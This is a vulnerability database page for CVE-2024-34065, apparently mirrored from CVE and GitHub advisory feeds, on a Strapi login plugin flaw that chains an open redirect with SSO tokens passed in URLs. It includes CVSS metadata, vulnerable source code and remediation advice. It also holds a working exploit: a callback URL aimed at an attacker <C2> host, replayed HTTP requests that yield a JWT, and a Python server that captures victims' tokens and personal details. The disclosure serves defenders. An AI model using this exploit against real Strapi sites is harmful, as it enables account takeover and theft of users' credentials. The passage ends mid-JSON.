cve-2024-34065

Vulnerability from cvelistv5

Published

2024-06-12 14:54

Modified

2024-08-02 02:42

Severity ?

7.1 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Summary

@strapi/plugin-users-permissions leaks 3rd party authentication tokens and authentication bypass

References

▼	URL	Tags
	security-advisories@github.com	https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc	Exploit, Vendor Advisory

Impacted products

▼	Vendor	Product
	strapi	strapi

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "strapi",
            "vendor": "strapi",
            "versions": [
              {
                "lessThanOrEqual": "4.24.1",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-34065",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-12T16:08:21.487136Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-12T16:10:44.870Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T02:42:59.898Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "strapi",
          "vendor": "strapi",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 4.24.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Strapi is an open-source content management system. By combining two vulnerabilities (an `Open Redirect` and `session token sent as URL query parameter`) in @strapi/plugin-users-permissions before version 4.24.2, is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click). Unauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps. Users should upgrade @strapi/plugin-users-permissions to version 4.24.2 to receive a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-294",
              "description": "CWE-294: Authentication Bypass by Capture-replay",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-601",
              "description": "CWE-601: URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-06-12T14:54:46.045Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc"
        }
      ],
      "source": {
        "advisory": "GHSA-wrvh-rcmr-9qfc",
        "discovery": "UNKNOWN"
      },
      "title": "@strapi/plugin-users-permissions leaks 3rd party authentication tokens and authentication bypass"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-34065",
    "datePublished": "2024-06-12T14:54:46.045Z",
    "dateReserved": "2024-04-30T06:56:33.381Z",
    "dateUpdated": "2024-08-02T02:42:59.898Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-34065\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-06-12T15:15:51.460\",\"lastModified\":\"2024-09-26T14:55:53.360\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Strapi is an open-source content management system. By combining two vulnerabilities (an `Open Redirect` and `session token sent as URL query parameter`) in @strapi/plugin-users-permissions before version 4.24.2, is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click). Unauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps. Users should upgrade @strapi/plugin-users-permissions to version 4.24.2 to receive a patch.\"},{\"lang\":\"es\",\"value\":\"Strapi es un sistema de gesti\u00f3n de contenidos de c\u00f3digo abierto. Al combinar dos vulnerabilidades (un `Open Redirect` y un `token de sesi\u00f3n enviado como par\u00e1metro de consulta de URL`) en @strapi/plugin-users-permissions antes de la versi\u00f3n 4.24.2, es posible que un atacante no autenticado evite los mecanismos de autenticaci\u00f3n y recupere  the 3rd party tokens. El ataque requiere la interacci\u00f3n del usuario (un clic). Los atacantes no autenticados pueden aprovechar dos vulnerabilidades para obtener un token de terceros y evitar la autenticaci\u00f3n de las aplicaciones Strapi. Los usuarios deben actualizar @strapi/plugin-users-permissions a la versi\u00f3n 4.24.2 para recibir un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-294\"},{\"lang\":\"en\",\"value\":\"CWE-601\"}]},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-294\"},{\"lang\":\"en\",\"value\":\"CWE-601\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.24.2\",\"matchCriteriaId\":\"D0B5DAE3-AC23-48C9-B266-7315B643700A\"}]}]}],\"references\":[{\"url\":\"https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}"
  }
}

ghsa-wrvh-rcmr-9qfc

Vulnerability from github

Published

2024-06-12 19:39

Modified

2024-06-12 19:39

Severity ?

7.1 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

Summary

@strapi/plugin-users-permissions leaks 3rd party authentication tokens and authentication bypass

Details

Summary

By combining two vulnerabilities (an Open Redirect and session token sent as URL query parameter) in Strapi framework is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click).

Impact

Unauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps.

Technical details

Vulnerability 1: Open Redirect

Description

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.

In the specific context of Strapi, this vulnerability allows the SSO token to be stolen, allowing an attacker to authenticate himself within the application.

Remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behavior can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.

Example 1: Open Redirect in /api/connect/microsoft via `$_GET["callback"]`

Path: /api/connect/microsoft
Parameter: $_GET["callback"]

Payload:

plaintext https://google.fr/

Final payload:

plaintext https://<TARGET>/api/connect/microsoft?callback=https://google.fr/

User clicks on the link:

Look at the intercepted request in Burp and see the redirect to Microsoft:

Microsoft check the cookies and redirects to the original domain (and route) but with different GET parameters.

Then, the page redirects to the domain controlled by the attacker (and a token is added to controlled the URL):

The domain originally specified (https://google.fr) as $_GET["callback"] parameter is present in the cookies. So \<TARGET> is using the cookies (koa.sess) to redirect.

koa.sess cookie:

base64 eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2dvb2dsZS5mci8ifX0sIl9leHBpcmUiOjE3MDAyMzQyNDQyNjMsIl9tYXhBZ2UiOjg2NDAwMDAwfQ==

json {"grant":{"provider":"microsoft","dynamic":{"callback":"https://google.fr/"}},"_expire":1700234244263,"_maxAge":86400000}

The vulnerability seems to come from the application's core:

File: packages/plugins/users-permissions/server/controllers/auth.js

```js 'use strict';

/* * Auth.js controller * * @description: A set of functions called "actions" for managing Auth. /

/ eslint-disable no-useless-escape / const crypto = require('crypto'); const _ = require('lodash'); const { concat, compact, isArray } = require('lodash/fp'); const utils = require('@strapi/utils'); const { contentTypes: { getNonWritableAttributes }, } = require('@strapi/utils'); const { getService } = require('../utils'); const { validateCallbackBody, validateRegisterBody, validateSendEmailConfirmationBody, validateForgotPasswordBody, validateResetPasswordBody, validateEmailConfirmationBody, validateChangePasswordBody, } = require('./validation/auth');

const { getAbsoluteAdminUrl, getAbsoluteServerUrl, sanitize } = utils; const { ApplicationError, ValidationError, ForbiddenError } = utils.errors;

const sanitizeUser = (user, ctx) => { const { auth } = ctx.state; const userSchema = strapi.getModel('plugin::users-permissions.user');

return sanitize.contentAPI.output(user, userSchema, { auth }); };

module.exports = { async callback(ctx) { const provider = ctx.params.provider || 'local'; const params = ctx.request.body;

const store = strapi.store({ type: 'plugin', name: 'users-permissions' });
const grantSettings = await store.get({ key: 'grant' });

const grantProvider = provider === 'local' ? 'email' : provider;

if (!_.get(grantSettings, [grantProvider, 'enabled'])) {
  throw new ApplicationError('This provider is disabled');
}

if (provider === 'local') {
  await validateCallbackBody(params);

  const { identifier } = params;

  // Check if the user exists.
  const user = await strapi.query('plugin::users-permissions.user').findOne({
    where: {
      provider,
      $or: [{ email: identifier.toLowerCase() }, { username: identifier }],
    },
  });

  if (!user) {
    throw new ValidationError('Invalid identifier or password');
  }

  if (!user.password) {
    throw new ValidationError('Invalid identifier or password');
  }

  const validPassword = await getService('user').validatePassword(
    params.password,
    user.password
  );

  if (!validPassword) {
    throw new ValidationError('Invalid identifier or password');
  }

  const advancedSettings = await store.get({ key: 'advanced' });
  const requiresConfirmation = _.get(advancedSettings, 'email_confirmation');

  if (requiresConfirmation && user.confirmed !== true) {
    throw new ApplicationError('Your account email is not confirmed');
  }

  if (user.blocked === true) {
    throw new ApplicationError('Your account has been blocked by an administrator');
  }

  return ctx.send({
    jwt: getService('jwt').issue({ id: user.id }),
    user: await sanitizeUser(user, ctx),
  });
}

// Connect the user with the third-party provider.
try {
  const user = await getService('providers').connect(provider, ctx.query);

  if (user.blocked) {
    throw new ForbiddenError('Your account has been blocked by an administrator');
  }

  return ctx.send({
    jwt: getService('jwt').issue({ id: user.id }),
    user: await sanitizeUser(user, ctx),
  });
} catch (error) {
  throw new ApplicationError(error.message);
}

//...

async connect(ctx, next) { const grant = require('grant-koa');

const providers = await strapi
  .store({ type: 'plugin', name: 'users-permissions', key: 'grant' })
  .get();

const apiPrefix = strapi.config.get('api.rest.prefix');
const grantConfig = {
  defaults: {
    prefix: `${apiPrefix}/connect`,
  },
  ...providers,
};

const [requestPath] = ctx.request.url.split('?');
const provider = requestPath.split('/connect/')[1].split('/')[0];

if (!_.get(grantConfig[provider], 'enabled')) {
  throw new ApplicationError('This provider is disabled');
}

if (!strapi.config.server.url.startsWith('http')) {
  strapi.log.warn(
    'You are using a third party provider for login. Make sure to set an absolute url in config/server.js. More info here: https://docs.strapi.io/developer-docs/latest/plugins/users-permissions.html#setting-up-the-server-url'
  );
}

// Ability to pass OAuth callback dynamically
grantConfig[provider].callback =
  _.get(ctx, 'query.callback') ||
  _.get(ctx, 'session.grant.dynamic.callback') ||
  grantConfig[provider].callback;
grantConfig[provider].redirect_uri = getService('providers').buildRedirectUri(provider);

return grant(grantConfig)(ctx, next);

//...

}; ```

And more specifically:

```js ...

// Ability to pass OAuth callback dynamically
grantConfig[provider].callback =
  _.get(ctx, 'query.callback') ||
  _.get(ctx, 'session.grant.dynamic.callback') ||
  grantConfig[provider].callback;
grantConfig[provider].redirect_uri = getService('providers').buildRedirectUri(provider);

return grant(grantConfig)(ctx, next);

... ```

Possible patch:

js grantConfig[provider].callback = process.env[`${provider.toUpperCase()}_REDIRECT_URL`] || grantConfig[provider].callback

_.get(ctx, 'query.callback') = $_GET["callback"] and _.get(ctx, 'session') = $_COOKIE["koa.sess"] (which is {"grant":{"provider":"microsoft","dynamic":{"callback":"https://XXXXXXX/"}},"_expire":1701275652123,"_maxAge":86400000}) so _.get(ctx, 'session.grant.dynamic.callback') = https://XXXXXXX/.

The route is clearly defined here:

File: packages/plugins/users-permissions/server/routes/content-api/auth.js

```js 'use strict';

module.exports = [

//...

{ method: 'GET', path: '/auth/:provider/callback', handler: 'auth.callback', config: { prefix: '', }, },

//...

]; ```

File: packages/plugins/users-permissions/server/services/providers-registry.js

```js

const getInitialProviders = ({ purest }) => ({

//..

async microsoft({ accessToken }) { const microsoft = purest({ provider: 'microsoft' });

return microsoft
  .get('me')
  .auth(accessToken)
  .request()
  .then(({ body }) => ({
    username: body.userPrincipalName,
    email: body.userPrincipalName,
  }));

//..

}); ```

If parameter $_GET["callback"] is defined in the GET request, the assignment does not evaluate all conditions, but stops at the beginning. The value is then stored in the cookie koa.sess:

koa.sess=eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2FkbWluLmludGUubmV0YXRtby5jb20vdXNlcnMvYXV0aC9yZWRpcmVjdCJ9fSwiX2V4cGlyZSI6MTcwMTI3NTY1MjEyMywiX21heEFnZSI6ODY0MDAwMDB9

Which once base64 decoded become {"grant":{"provider":"microsoft","dynamic":{"callback":"https://<TARGET>/users/auth/redirect"}},"_expire":1701275652123,"_maxAge":86400000}.

The signature of the cookie is stored in cookie koa.sess.sig:

koa.sess.sig=wTRmcVRrn88hWMdg84VvSD87-_0

File: packages/plugins/users-permissions/server/bootstrap/grant-config.js

```js

//..

microsoft: { enabled: false, icon: 'windows', key: '', secret: '', callback: ${baseURL}/microsoft/callback, scope: ['user.read'], },

//.. ```

Vulnerability 2: Session token in URL

Description

Applications should not send session tokens as URL query parameters and use instead an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Example 1: SSO token transmitted within URL (`$_GET["access_token"]`)

Path: /api/connect/microsoft
Parameter: $_GET["callback"]

When a callback was called, the 3rd party token was transmitted in an insecure way within the URL, which could be used to increase the impact of the Open Redirect vulnerability described previously by stealing the SSO token.

Weaponized payload:

plaintext https://<TARGET>/api/connect/microsoft?callback=http://<C2>:8080/

With a web server specially developed to exploit the vulnerability listening on \<C2>:8080, it is possible to retrieve a JWT token allowing authentication on Strapi.

A user is on his browser when he decides to click on a link sent to him by e-mail.

The attacker places the malicious link in the URL bar to simulate a victim's click.

The server specially developed by the attacker to show that the vulnerability is exploitable, recovers the user's SSO token.

Everything is invisible to the victim.

Because the victim didn't change to another Web page.

The attacker can use the SSO token to authenticate himself within the application and retrieve a valid JWT token enabling him to interact with it.

Details

Get the JWT token with the `access_token`

First of all, thanks to the SSO token, you authenticate yourself and get a JWT token to be able to interact with the various API routes.

Request (HTTP):

```http GET /api/auth/microsoft/callback?access_token=eyJ0eXAiOiJKVyBzA HTTP/1.1 Host:

```

Response (HTTP):

```http HTTP/1.1 200 OK Server: nginx Date: Mon, 27 Nov 2023 17:58:46 GMT Content-Type: application/json; charset=utf-8 Content-Length: 411 Connection: keep-alive Content-Security-Policy: connect-src 'self' https:;img-src 'self' data: blob: https://market-assets.strapi.io;media-src 'self' data: blob:;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline' Referrer-Policy: no-referrer Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-DNS-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none Vary: Origin X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=31536000; includeSubDomains X-Powered-By:

{"jwt":"eyJhbGeCac","user":{"id":111,"username":"@-ext.com","email":"@-ext.com","provider":"microsoft","confirmed":true,"blocked":false,"createdAt":"2023-11-14T12:35:42.440Z","updatedAt":"2023-11-16T21:00:19.241Z","is_external":false}} ```

Request API routes using the JWT token

Then reuse the JWT token to request the API.

Request (HTTP):

```http GET /api/users/me/groups?app=support HTTP/1.1 Host: Authorization: Bearer eyJEeCac

```

Response (HTTP):

```http HTTP/1.1 200 OK Server: nginx Date: Tue, 28 Nov 2023 13:45:42 GMT Content-Type: application/json; charset=utf-8 Content-Length: 24684 Connection: keep-alive Content-Security-Policy: connect-src 'self' https:;img-src 'self' data: blob: https://market-assets.strapi.io;media-src 'self' data: blob:;default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline' Referrer-Policy: no-referrer Strict-Transport-Security: max-age=31536000; includeSubDomains X-Content-Type-Options: nosniff X-DNS-Prefetch-Control: off X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none Vary: Origin X-RateLimit-Limit: 10 X-RateLimit-Remaining: 9 X-RateLimit-Reset: 1701179203 X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=31536000; includeSubDomains X-Powered-By:

{"apps":{"support":{"groups":[{"device_whitelist":null,"name":"test - support","id":10,"group_privileges":[{"id":37,

... ```

POC (Web server stealing SSO token and retrieving JWT token then bypassing authentication)

```python import base64 import json import urllib.parse

from http.server import BaseHTTPRequestHandler, HTTPServer from sys import argv

Strapi URL.

TARGET = "target.com"

URLs to which victims are automatically redirected.

REDIRECT_URL = [ "strapi.io", "www.google.fr" ]

URL used to generate a valid JWT token for authentication within the

application.

GEN_JWT_URL = f"https://{TARGET}/api/auth/microsoft/callback"

This function is used to generate a curl command which once executed, will

give us a valid JWT connection token.

def generate_curl_command(token): command = f"curl '{GEN_JWT_URL}?access_token={token}'" return command

We create a custom HTTP server to retrieve users' SSO tokens.

class CustomServer(BaseHTTPRequestHandler):

# Here we override the default logging function to reduce verbosity.
def log_message(self, format, *args):
    pass

# This function automatically redirects a user to the page defined in the
# global variable linked to the redirection.
def _set_response(self):
    self.send_response(302)
    self.send_header("Location", REDIRECT_URL[0])
    self.end_headers()

# If an SSO token is present, we parse it and log the result in STDOUT.
def do_GET(self):
    # This condition checks whether a token is present in the URL.
    if str(self.path).find("access_token") != -1:
        # If this is the case, we recover the token.
        query = urllib.parse.urlparse(self.path).query
        query_components = dict(qc.split("=") for qc in query.split("&"))
        access_token = urllib.parse.unquote(query_components["access_token"])

        # In the token, which is a string in JWT format, we retrieve the
        # body part of the token.
        interesting_data = access_token.split(".")[1]

        # Patching base64 encoded data.
        interesting_data = interesting_data + "=" * (-len(interesting_data) % 4)

        # Parsing JSON.
        json_data = json.loads(base64.b64decode(interesting_data.encode()))
        family_name, given_name, ipaddr, upn = json_data["given_name"], json_data["family_name"], json_data["ipaddr"], json_data["upn"]

        print(f"[+] Token captured for {family_name} {given_name}, {upn} ({ipaddr}):\n{access_token}\n")
        print(f"[*] Run: \"{generate_curl_command(query_components['access_token'])}\" to get JWT token")

    self._set_response()
    self.wfile.write("Redirecting ...".encode("utf-8"))

def run(server_class=HTTPServer, handler_class=CustomServer, ip="0.0.0.0", port=8080): server_address = (ip, port) httpd = server_class(server_address, handler_class)

print(f"Starting httpd ({ip}:{port}) ...")
try:
    httpd.serve_forever()
except KeyboardInterrupt:
    pass

httpd.server_close()
print("Stopping httpd ...")

if name == "main": if len(argv) == 3: run(ip=argv[1], port=int(argv[2])) else: run() ```

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@strapi/plugin-users-permissions"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.24.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-34065"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-294",
      "CWE-601"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-12T19:39:11Z",
    "nvd_published_at": "2024-06-12T15:15:51Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nBy combining two vulnerabilities (an `Open Redirect` and `session token sent as URL query parameter`) in Strapi framework is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click).\n\n### Impact\n\nUnauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps.\n\n### Technical details\n\n#### Vulnerability 1: Open Redirect\n\n##### Description\n\nOpen redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.\n\nIn the specific context of Strapi, this vulnerability allows the SSO token to be stolen, allowing an attacker to authenticate himself within the application.\n\n##### Remediation\n\nIf possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behavior can be avoided in two ways:\n\n- Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.\n- Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.\n\nIf it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:\n\n- The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.\n- The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend \u003cspan dir=\"\"\u003ehttp://yourdomainname.com\u003c/span\u003e to the URL before issuing the redirect.\n\n###### Example 1: Open Redirect in \u003cspan dir=\"\"\u003e/api/connect/microsoft\u003c/span\u003e via `$_GET[\"callback\"]`\n\n- Path: \u003cspan dir=\"\"\u003e/api/connect/microsoft\u003c/span\u003e\n- Parameter: `$_GET[\"callback\"]`\n\nPayload:\n\n```plaintext\nhttps://google.fr/\n```\n\nFinal payload:\n\n```plaintext\nhttps://\u003cTARGET\u003e/api/connect/microsoft?callback=https://google.fr/\n```\n\nUser clicks on the link:\n![c1](https://github.com/strapi/strapi/assets/30262080/c1944cf8-2ef0-4214-ba9e-d4aad10d85ba)\n\nLook at the intercepted request in Burp and see the redirect to Microsoft:\n\n![c0](https://github.com/strapi/strapi/assets/30262080/0c3d9289-432c-46ac-a7e3-eafe15f02483)\n\nMicrosoft check the cookies and redirects to the original domain (and route) but with different GET parameters.\n\nThen, the page redirects to the domain controlled by the attacker (and a token is added to controlled the URL):\n\n![c2](https://github.com/strapi/strapi/assets/30262080/009e3898-1ccf-4ee4-9c29-496ff6b302d0)\n\nThe domain originally specified (https://google.fr) as `$_GET[\"callback\"]` parameter is present in the cookies. So \u003cspan dir=\"\"\u003e\\\u003cTARGET\\\u003e\u003c/span\u003e is using the cookies (`koa.sess`) to redirect.\n\n![c3](https://github.com/strapi/strapi/assets/30262080/4c25cb6c-c9e8-4c2d-aa61-1ad1442e5f4d)\n\n`koa.sess` cookie:\n\n```base64\neyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2dvb2dsZS5mci8ifX0sIl9leHBpcmUiOjE3MDAyMzQyNDQyNjMsIl9tYXhBZ2UiOjg2NDAwMDAwfQ==\n```\n\n```json\n{\"grant\":{\"provider\":\"microsoft\",\"dynamic\":{\"callback\":\"https://google.fr/\"}},\"_expire\":1700234244263,\"_maxAge\":86400000}\n```\n\nThe vulnerability seems to come from the application\u0027s core:\n\nFile: [\u003cspan dir=\"\"\u003epackages/plugins/users-permissions/server/controllers/auth.js\u003c/span\u003e](https://github.com/strapi/strapi/blob/develop/packages/plugins/users-permissions/server/controllers/auth.js)\n\n```js\n\u0027use strict\u0027;\n\n/**\n * Auth.js controller\n *\n * @description: A set of functions called \"actions\" for managing `Auth`.\n */\n\n/* eslint-disable no-useless-escape */\nconst crypto = require(\u0027crypto\u0027);\nconst _ = require(\u0027lodash\u0027);\nconst { concat, compact, isArray } = require(\u0027lodash/fp\u0027);\nconst utils = require(\u0027@strapi/utils\u0027);\nconst {\n  contentTypes: { getNonWritableAttributes },\n} = require(\u0027@strapi/utils\u0027);\nconst { getService } = require(\u0027../utils\u0027);\nconst {\n  validateCallbackBody,\n  validateRegisterBody,\n  validateSendEmailConfirmationBody,\n  validateForgotPasswordBody,\n  validateResetPasswordBody,\n  validateEmailConfirmationBody,\n  validateChangePasswordBody,\n} = require(\u0027./validation/auth\u0027);\n\nconst { getAbsoluteAdminUrl, getAbsoluteServerUrl, sanitize } = utils;\nconst { ApplicationError, ValidationError, ForbiddenError } = utils.errors;\n\nconst sanitizeUser = (user, ctx) =\u003e {\n  const { auth } = ctx.state;\n  const userSchema = strapi.getModel(\u0027plugin::users-permissions.user\u0027);\n\n  return sanitize.contentAPI.output(user, userSchema, { auth });\n};\n\nmodule.exports = {\n  async callback(ctx) {\n    const provider = ctx.params.provider || \u0027local\u0027;\n    const params = ctx.request.body;\n\n    const store = strapi.store({ type: \u0027plugin\u0027, name: \u0027users-permissions\u0027 });\n    const grantSettings = await store.get({ key: \u0027grant\u0027 });\n\n    const grantProvider = provider === \u0027local\u0027 ? \u0027email\u0027 : provider;\n\n    if (!_.get(grantSettings, [grantProvider, \u0027enabled\u0027])) {\n      throw new ApplicationError(\u0027This provider is disabled\u0027);\n    }\n\n    if (provider === \u0027local\u0027) {\n      await validateCallbackBody(params);\n\n      const { identifier } = params;\n\n      // Check if the user exists.\n      const user = await strapi.query(\u0027plugin::users-permissions.user\u0027).findOne({\n        where: {\n          provider,\n          $or: [{ email: identifier.toLowerCase() }, { username: identifier }],\n        },\n      });\n\n      if (!user) {\n        throw new ValidationError(\u0027Invalid identifier or password\u0027);\n      }\n\n      if (!user.password) {\n        throw new ValidationError(\u0027Invalid identifier or password\u0027);\n      }\n\n      const validPassword = await getService(\u0027user\u0027).validatePassword(\n        params.password,\n        user.password\n      );\n\n      if (!validPassword) {\n        throw new ValidationError(\u0027Invalid identifier or password\u0027);\n      }\n\n      const advancedSettings = await store.get({ key: \u0027advanced\u0027 });\n      const requiresConfirmation = _.get(advancedSettings, \u0027email_confirmation\u0027);\n\n      if (requiresConfirmation \u0026\u0026 user.confirmed !== true) {\n        throw new ApplicationError(\u0027Your account email is not confirmed\u0027);\n      }\n\n      if (user.blocked === true) {\n        throw new ApplicationError(\u0027Your account has been blocked by an administrator\u0027);\n      }\n\n      return ctx.send({\n        jwt: getService(\u0027jwt\u0027).issue({ id: user.id }),\n        user: await sanitizeUser(user, ctx),\n      });\n    }\n\n    // Connect the user with the third-party provider.\n    try {\n      const user = await getService(\u0027providers\u0027).connect(provider, ctx.query);\n\n      if (user.blocked) {\n        throw new ForbiddenError(\u0027Your account has been blocked by an administrator\u0027);\n      }\n\n      return ctx.send({\n        jwt: 